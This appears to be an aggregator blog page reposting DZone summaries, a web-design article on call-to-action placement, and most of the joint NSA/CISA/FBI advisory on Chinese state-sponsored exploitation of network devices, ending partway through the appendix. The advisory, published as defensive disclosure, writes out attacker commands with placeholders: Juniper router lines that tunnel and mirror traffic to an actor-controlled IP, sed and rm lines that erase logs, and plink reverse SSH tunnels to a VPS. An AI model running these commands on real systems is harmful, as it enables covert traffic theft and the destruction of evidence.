Data Lineage Is Broken — Here Are 5 Ways to Fix It

,

Data lineage isn’t new, but automation has finally made it accessible and scalable—to a certain extent. 

In the old days (way back in the mid-2010s), lineage happened through a lot of manual work. This involved identifying data assets, tracking them to their ingestion sources, documenting those sources, mapping the path of data as it moved through various pipelines and stages of transformation, and pinpointing where the data was served up in dashboards and reports. 

Source de l’article sur DZONE

/par

Getting Started With Service Calls and Serverless Workflow

,

Workflows are great for orchestrating services, functions, or events. They provide out-of-the-box features to make your applications resilient, reliable, and simple.

But currently, each cloud vendor has its workflow solution. AWS has Step Functions, Google has Google Workflows, Microsoft has Azure Durable functions, and so on. The lack of a common way to define workflows becomes an issue when you need to migrate or host your applications on more than one cloud vendor. It also limits the potential for creating tools and infrastructures that support several platforms. This is what the Serverless Workflow specification addresses.

Source de l’article sur DZONE

/par

Perfect CTA Placement: Above-The-Fold Vs. Below-The-Fold

,

As a website designer, your professional life revolves around crucial questions that might help you to deliver better results for your clients.

Which widgets are essential to driving conversions? What kind of checkout page elements do you need to include? Should there be a video or slideshow on that product page?

One of the biggest queries that we face when building landing pages to encourage sales is whether a CTA (call to action) button needs to be above or below the fold. 

Answering the question: “Where should the CTA go?” correctly could make or break your client’s chances of a sale. Unfortunately, this particular concern has been the source of a raging debate for many years now. Everyone has their own opinion about CTAs and where they belong.

Today, we’re going to cover the benefits and issues with placing a CTA above the fold.

Should You Place a CTA Above the Fold? 

Starting with a quick refresher, the term “above the fold” refers to any area of a website seen on a screen when a user arrives on a webpage. The content that appears above and below the fold may differ depending on the device you’re visiting a website with. 

Experts in the design and digital marketing world have frequently claimed that if you want to get the best results with a CTA, you need to place it above the fold. 

This strategy makes a lot of sense. If your CTA is above the fold, then your chances of it being seen are significantly higher. Some customers might not want to scroll to the bottom of a page to find out what they need to do next in their buyer journey. 

Additionally, according to the NN group, the 100 pixels that appeared above the fold were seen 102% more often than the pixels underneath the fold. Eye-tracking technology learned that more often than not, you’ll get more engagement above the fold. 

Just look at this landing page from Lyft, for instance, you immediately see what you need to do next:

It’s not just a single study that has touted the benefits of an above-the-fold CTA, either. 

Another report into the “importance of being seen” found that above-the-fold ads and CTAs had a 73% rate of visibility compared to only 44% for those below the fold

So, with stats like that to think about, why would you ever consider using a below-the-fold CTA? 

When to Place a CTA Below the Fold

As with most things in web design, there is an exception to the rule. 

Yes, above the fold, CTAs will be better for you most of the time. However, there are times when you might need to think outside of the box. 

Most people think that placing a CTA below the fold practically guarantees that it won’t be seen. However, if you’re creating a website page or landing page that includes a lot of vital information, your audience will need to scroll. 

For instance, if you’re creating a page where someone can download an app to engage with a business they already know about, it makes sense to speed the journey along with an above-the-fold CTA. However, if you’re trying to convince someone to sign up for your webinar, you might need to tell them what that webinar is all about first. That’s where a below-the-fold CTA comes in handy. 

Customers might not have a lot of time in their busy schedules for scrolling these days. However, they still need the right information before they can make a decision about what to do next with your brand. According to Marketing Experiments, below the fold, CTA buttons can result in a 20% increase in conversions. However, this conversion boost only happens when you’re providing valuable, engaging, and persuasive content.

Check out this example from the Boston Globe, for instance:

The Fold Isn’t Everything in Web Design

The fold is often an essential consideration in web design. 

However, it’s not all you need to think about when you’re deciding where to place sign-up forms and valuable CTA buttons. 

According to the Nielsen Norman group, the content that appears at the top of the page will always influence user experience. However, that doesn’t mean that you need to place your CTA there. What you do need to do is ensure that whatever you have above the fold is promising enough to engage your visitor and make them scroll. 

Put simply, what’s above and below the fold does matter, but your focus should be on taking advantage of customer motivation, rather than worrying exclusively about an imaginary line. 

When deciding where a CTA belongs, you need to think about motivation. 

How motivated is your prospect to click on a button? How desirable is your offering at that time, and how much does your visitor already know about the thing they’re being offered?

If you’re going to need to provide more information before your customer wants to convert, then a below-the-fold CTA makes more sense. 

If you’ve already provided all the information that your customer needs and a prospect is visiting from an advertisement or another page on the website, then above the fold should be exceptional. 

The Truth About Designing for The Fold

The reality for web designers today is that achieving higher conversion rates doesn’t really have that much to do with whether a CTA is above or below the fold.

What’s important is whether your buttons come under the right amount of copy that answers the correct questions for an audience. 

Remember, when visitors come to a website, they’re looking for different things. There are visitors that:

  • Already know your brand and value your offering: These people are often clicking into your landing pages from other marketing campaigns where they’ve learned about the brand or offer. You can give these prospects a CTA immediately so they can continue down the buyer’s funnel as fast as possible. 
  • Are uncertain about your offering and need to know a bit more: These people need some extra information. They might have a concern that needs to be addressed before they’re willing to spend their money. You might not need much copy here, which means that a CTA may still appear above the fold. 
  • Are brand new to your website: These prospects need a reasonable amount of copy. They don’t know what you’re offering or why it’s valuable to them. Because of this, you may need to wait to push them into action until you’ve delivered the right copy. 

In some cases, you may even place multiple CTAs on the same page. Some people will have a general understanding of the technology and what it does. This means that they’ll be happy to click on the button at the top of the fold. 

On the other hand, there could also be visitors arriving on the same page that don’t understand what the benefits of real-time personalization are. This means that you need to elaborate a little on what you have to offer. A simple one-line explanation isn’t enough here.  

Figuring Out Where to Place a CTA

Deciding where to place different elements of a website is a common challenge for web designers. Despite tons of blogs out there, that claim “above the fold” is always the best option for any conversion rate optimization, the truth is a little more complicated. 

The critical thing to remember as a web designer is that a CTA button asks a customer for commitment. Even if the CTA allows someone to download a free demo or sign-up for a newsletter without spending any money, it requires a customer to start a relationship with a brand. 

In a world where customers are less trusting of companies than ever, it doesn’t make sense to push them into a relationship too quickly. Asking for a commitment from a target audience before they’ve had the chance to see what’s “in it for them” is not a good idea. 

Jump in too quickly, and you’re likely to rub people the wrong way. 

Go Out and Master the Fold

The issue for today’s designers isn’t figuring out whether a button needs to be visible from the moment someone arrives on a page. Instead, you need to think about whether visitors are finding the CTA at a time when they’re ready to take action. 

You can only answer the question “where should the CTA go?” after you’ve carefully analyzed the project that you’re working on. 

Remember, above the fold isn’t always the answer. 

 

Featured image via Pexels.

Source

The post Perfect CTA Placement: Above-The-Fold Vs. Below-The-Fold first appeared on Webdesigner Depot.

Source de l’article sur Webdesignerdepot

/par

How to Prevent Security Risks in the Private Cloud

,

Organizations that want to use the cloud but don’t want to entrust their data to an external provider build their own on-premises cloud, also known as a private cloud. They build their own infrastructure, buy their own software, and build an in-house team to oversee everything. While the goal is to stay in control of your data, this technique is fraught with security threats and other pitfalls. 

Haven’t you ever thought about migrating to the cloud? If you are already migrated to the environment of a private cloud, there are a few security risks in the private cloud that are found crucial.  

Source de l’article sur DZONE

/par

AA22-158A: People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

, ,

Original release date: June 7, 2022

Summary

Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system

This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.

This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).

Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.

NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.

For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.

Click here for PDF.

Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors

PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.

Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133]  or public facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems. 

PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.

These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.

NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.

 

Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors

Vendor                                       CVE                                  Vulnerability Type
Cisco CVE-2018-0171 Remote Code Execution
CVE-2019-15271 RCE
CVE-2019-1652 RCE
Citrix CVE-2019-19781 RCE
DrayTek CVE-2020-8515 RCE
D-Link CVE-2019-16920 RCE
Fortinet CVE-2018-13382 Authentication Bypass
MikroTik CVE-2018-14847 Authentication Bypass
Netgear CVE-2017-6862 RCE
Pulse CVE-2019-11510 Authentication Bypass
CVE-2021-22893 RCE
QNAP CVE-2019-7192 Privilege Elevation
CVE-2019-7193 Remote Inject
CVE-2019-7194 XML Routing Detour Attack
CVE-2019-7195 XML Routing Detour Attack
Zyxel CVE-2020-29583 Authentication Bypass

Telecommunications and network service provider targeting

PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.

Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts. 

Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.

Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure. 

While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:

set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
 

After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.

set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
 

PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. 

set firewall family inet filter <filter name> term <filter variable> then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
 

Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.

sed -i -e ‘/<REGEX>/d’ <log filepath 1>
sed -i -e ‘/<REGEX>/d’ <log filepath 2>
sed -i -e ‘/<REGEX>/d’ <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
 

PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.

plink.exe –N –R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>
plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
 

Mitigations

NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:

  • Keep systems and products updated and patched as soon as possible after patches are released [D3-SU] . Consider leveraging a centralized patch management system to automate and expedite the process.
  • Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
  • Segment networks to limit or block lateral movement [D3-NI]. 
  • Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF]. 
  • Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA]. 
  • Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP]. 
  • Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
  • Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures. 
  • Disable external management capabilities and set up an out-of-band management network [D3-NI].
  • Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
  • Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
  • Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
  • Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM]. 
  • Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.

Resources

Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.

U.S. government and critical infrastructure organizations, should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.

U.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email dib_defense@cyber.nsa.gov.

Additional References

Contact Information 

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov

Media Inquiries / Press Desk: 

Disclaimer of endorsement

The information and opinions contained in this document are provided « as is » and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. 

Appendix A: Vulnerabilities

Table 2: Information on Cisco CVE-2018-0171

                                        Cisco CVE-2018-0171                           CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, causing an indefinite loop on the affected device that triggers a watchdog crash.
Recommended Mitigations 

  • Cisco has released software updates that address this vulnerability.
  • In addition, the Cisco Smart Install feature is highly recommended to be disabled to reduce exposure.
Detection Methods

  • CISCO IOS Software Checker

Vulnerable Technologies and Versions

The vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have the smart install client feature enabled. Only smart install client switches are affected by this vulnerability described in this advisory. 

References

http://www.securityfocus.com/bid/103538
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05
https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490
http://www.securitytracker.com/id/1040580

 

Table 3: Information on Cisco CVE-2019-15271

                                              Cisco CVE-2019-15271                      CVSS 3.0: 8.8 (High)

Vulnerability Description 

A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.
Recommended Mitigations 

  • Cisco has released free software updates that address the vulnerability described in this advisory.
  • Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.
  • Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default.
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:

  • RV016 Multi-WAN VPN Router
  • RV042 Dual WAN VPN Router
  • RV042G Dual Gigabit WAN VPN Router
  • RV082 Dual WAN VPN Router

References 

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x

 

Table 4: Information on Cisco CVE-2019-1652

                                                Cisco CVE-2019-1652                    CVSS 3.0: 7.2 (High)

Vulnerability Description 

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.
Recommended Mitigations 

  • Cisco has released free software updates that address the vulnerability described in this advisory
  • This vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and later.
  • If the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure.
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20.

References 

http://www.securityfocus.com/bid/106728
https://seclists.org/bugtraq/2019/Mar/55
https://www.exploit-db.com/exploits/46243/
https://www.exploit-db.com/exploits/46655/
http://seclists.org/fulldisclosure/2019/Mar/61
http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html
http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject

 

Table 5: Information on Citrix CVE-2019-19781

                                                   Citrix CVE-2019-19781          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
Recommended Mitigations 

  • Implement the appropriate refresh according to the vulnerability details outlined by vendor: Citrix: Mitigation Steps for CVE-2019-19781. 
  • If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).
Detection Methods 

  • CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.
  • Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Critix ADC Path Traversal #1893.
  • Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.
  • CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.

Vulnerable Technologies and Versions 

The vulnerability affects the following Citrix product versions on all supported platforms:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
  • NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
  • NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13
  • NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15
  • NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b 

References 

https://support.citrix.com/article/CTX267027

 

Table 6: Information on DrayTek CVE-2020-8515

                                                 DrayTek CVE-2020-8515          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
Recommended Mitigations 

  • Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible, the updated firmware addresses this issue.
  • Disable the remote access on your router if you don’t need it.
  • Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so you should also temporarily disable SSL VPN until you have updated the firmware.
  • Always back up your config before doing an upgrade.
  • After upgrading, check that the web interface now shows the new firmware version.
  • Enable syslog logging for monitoring if there are abnormal events. 
Detection Methods 

  • Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.
  • Check if any ACL (Access Control Lists) have been altered.
Vulnerable Technologies and Versions 

  • This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.

References 

https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html

 

Table 7: Information on D-Link CVE-2019-16920

                                                   D-Link CVE-2019-16920          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a « PingTest » device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
Recommended Mitigations 

  • Recommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.
Detection Methods 

  • HTTP packet inspection to look for arbitrary input to the “ping_test” command 
Vulnerable Technologies and Versions 

  • DIR DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-82

References 

https://www.kb.cert.org/vuls/id/766427
https://fortiguard.com/zeroday/FG-VD-19-117
https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
https://www.seebug.org/vuldb/ssvid-98079

 

Table 8: Information on Fortinet CVE-2018-13382

                                                     Fortinet CVE-2018-13382            CVSS 3.0: 7.5 (High)

Vulnerability Description 

An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.
Recommended Mitigations 

  • Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.
  • SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).
  • Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).
  • Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: config vpn ssl settings, unset source-interface, end.
Detection Methods 

  • HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification

Vulnerable Technologies and Versions

This vulnerability affects the following products: 

  • Fortinet FortiOS 6.0.0 to 6.0.4
  • Fortinet FortiOS 5.6.0 to 5.6.8
  • Fortinet FortiOS 5.4.1 to 5.4.10
  • Fortinet FortiProxy 2.0.0
  • Fortinet FortiProxy 1.2.8 and below
  • Fortinet FortiProxy 1.1.6 and below
  • Fortinet FortiProxy 1.0.7 and below

FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with local authentication.

References 

https://fortiguard.com/psirt/FG-IR-18-389
https://fortiguard.com/advisory/FG-IR-18-389
https://www.fortiguard.com/psirt/FG-IR-20-231

 

Table 9: Information on Mikrotik CVE-2018-14847

                                            Mikrotik CVE-2018-14847            CVSS 3.0: 9.1 (Critical)

Vulnerability Description 

MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.
Recommended Mitigations 

  • Upgrade WinBox and RouterOS and change passwords
  • Firewall the WinBox port from the public interface and from untrusted networks
Detection Methods 

  • Use export command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS proxy settings and scripts.

Vulnerable Technologies and Versions 

This vulnerability affected the following MikroTik products:

  • All bugfix releases from 6.30.1 to 6.40.7
  • All current releases from 6.29 to 6.42
  • All RC releases from 6.29rc1 to 6.43rc3

References

https://blog.mikrotik.com/security/winbox-vulnerability.html

 

Table 10: Information on Netgear CVE-2017-6862

                                             Netgear CVE-2017-6862                  CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

NETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices before 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the administration webapp. The NETGEAR ID is PSV-2016-0261.
Recommended Mitigations 

  • NETGEAR has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products. 
Detection Methods 

  • HTTP packet inspection to find any specially crafted packets attempting a buffer overflow through specialized parameters.

Vulnerable Technologies and Versions 

This vulnerability affects the following products:

  • WNR2000v3 before version 1.1.2.14
  • WNR2000v4 before version 1.0.0.66
  • WNR2000v5 before version 1.0.0.42
  • R2000

References 

https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261
https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf
http://www.securityfocus.com/bid/98740

 

Table 11: Information on Pulse CVE-2019-11510

                                              Pulse CVE-2019-11510                   CVSS 3.0: 10 (Critical)

Vulnerability Description 

In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. 
Recommended Mitigations 

  • Upgrade to the latest Pulse Secure VPN.
  • Stay alert to any scheduled tasks or unknown files/executables.
  • Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files.

Detection Methods 

